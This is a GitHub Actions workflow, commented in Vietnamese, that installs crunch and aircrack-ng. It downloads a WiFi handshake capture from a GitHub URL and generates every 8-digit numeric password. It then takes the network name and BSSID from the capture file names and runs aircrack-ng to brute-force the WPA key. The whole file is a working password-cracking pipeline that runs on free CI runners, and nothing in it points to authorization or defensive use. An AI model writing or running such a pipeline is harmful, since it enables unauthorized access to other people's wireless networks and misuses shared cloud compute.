name: Aircarck-ng
on:
    workflow_dispatch:
    #schedule:
    # * is a special character in YAML so you have to quote this string
    #- cron:  "0 */4 * * *"
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    #  with:
    #    persist-credentials: false
    #    fetch-depth: 0
    - name: Chuan bi File
      run: |
        sudo apt install -y crunch
        sudo apt install -y aircrack-ng
        wget -O file.cap 'https://raw.githubusercontent.com/sattheptonghop/acr-ga/main/file.cap'
        crunch 8 8 0123456789 -o wordlist-probable.txt
    - name: Aircrack
      run: |
        # Đường dẫn tới thư mục chứa các tệp tin .cap
        directory="./"

        # Lặp qua tất cả các tệp tin .cap trong thư mục
        for file in "$directory"/*.cap; do
            # Kiểm tra xem tệp tin tồn tại và có quyền đọc
            if [ -f "$file" ] && [ -r "$file" ]; then
                # Trích xuất phần tên từ tệp tin bằng lệnh awk
                namewifi=$(echo "$file" | awk -F "_" '{print $2}')
                obssiwifi=$(echo "$file" | awk -F "_" '{print $3}')
                bssiwifi=$(echo "$obssiwifi" | sed 's/-/:/g')
                #echo "Tên tệp tin: $name"
                sudo aircrack-ng -e $namewifi -b $bssiwifi "$file" -w wordlist-probable.txt -q
            fi
        done
